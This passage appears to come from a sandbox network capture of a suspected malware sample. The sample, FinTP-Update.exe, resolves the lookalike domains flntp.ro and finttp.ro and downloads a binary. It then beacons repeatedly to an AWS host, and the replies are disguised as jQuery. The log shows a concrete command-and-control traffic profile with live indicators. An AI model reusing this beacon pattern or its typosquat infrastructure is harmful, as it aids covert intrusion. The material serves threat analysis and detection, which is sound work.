                                                                                                                            Dec 19, 2024 23:14:11.898900986 CET50014443192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:14:11.898920059 CET443500143.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:14:13.284307003 CET443500143.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:14:13.284359932 CET50014443192.168.2.53.79.209.76
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 23:12:08.414041996 CET | 57860 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 23:12:09.231911898 CET | 53 | 57860 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 23:12:12.103962898 CET | 61000 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 23:12:12.243721008 CET | 53 | 61000 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 23:12:14.479068041 CET | 53923 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 23:12:15.191356897 CET | 53 | 53923 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 23:12:08.414041996 CET | 192.168.2.5 | 1.1.1.1 | 0xd17f | Standard query (0) | www.flntp.ro | A (IP address) | IN (0x0001) | false
Dec 19, 2024 23:12:12.103962898 CET | 192.168.2.5 | 1.1.1.1 | 0x5ed8 | Standard query (0) | www.flntp.ro | A (IP address) | IN (0x0001) | false
Dec 19, 2024 23:12:14.479068041 CET | 192.168.2.5 | 1.1.1.1 | 0x47b6 | Standard query (0) | www.finttp.ro | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 23:12:09.231911898 CET | 1.1.1.1 | 192.168.2.5 | 0xd17f | No error (0) | www.flntp.ro | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 23:12:09.231911898 CET | 1.1.1.1 | 192.168.2.5 | 0xd17f | No error (0) | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | | 3.79.209.76 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 23:12:12.243721008 CET | 1.1.1.1 | 192.168.2.5 | 0x5ed8 | No error (0) | www.flntp.ro | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 23:12:12.243721008 CET | 1.1.1.1 | 192.168.2.5 | 0x5ed8 | No error (0) | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | | 3.79.209.76 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 23:12:15.191356897 CET | 1.1.1.1 | 192.168.2.5 | 0x47b6 | No error (0) | www.finttp.ro | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 23:12:15.191356897 CET | 1.1.1.1 | 192.168.2.5 | 0x47b6 | No error (0) | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | | 3.79.209.76 | A (IP address) | IN (0x0001) | false

                                                                                                                            • www.flntp.ro
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 3.79.209.76 | 80 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 23:12:09.537360907 CET | 51 | OUT | GET /fintp.x64.bin HTTP/1.0
                                                                                                                            Host: www.flntp.ro
Dec 19, 2024 23:12:10.800759077 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:10 GMT
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Content-Length: 342537
                                                                                                                            Last-Modified: Wed, 09 Oct 2024 08:15:21 GMT
                                                                                                                            Connection: close
                                                                                                                            ETag: "67063b99-53a09"
                                                                                                                            Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:13 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:14 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:14 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:14 UTC | 5671 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:16 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:17 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:17 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:17 UTC | 5671 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49707 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:18 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:19 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:19 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:19 UTC | 5713 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49708 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:21 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:21 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:21 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:21 UTC | 5628 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49710 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:23 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:23 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:23 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:23 UTC | 5671 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49717 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:25 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:26 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:25 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:26 UTC | 5628 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49725 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:27 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:28 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:28 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:28 UTC | 5671 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49731 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:30 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:30 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:30 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:30 UTC | 5607 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49738 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:32 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:33 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:32 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:33 UTC | 5671 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49744 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:34 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:35 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:35 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:35 UTC | 5649 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            10 | 192.168.2.5 | 49750 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:12:36 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:37 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:37 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:37 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            11 | 192.168.2.5 | 49756 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:12:39 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:39 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:39 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:39 UTC | 5671 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            12 | 192.168.2.5 | 49762 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:12:41 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:42 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:41 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:42 UTC | 5671 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            13 | 192.168.2.5 | 49768 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:12:43 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:44 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:44 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:44 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            14 | 192.168.2.5 | 49773 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:12:45 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
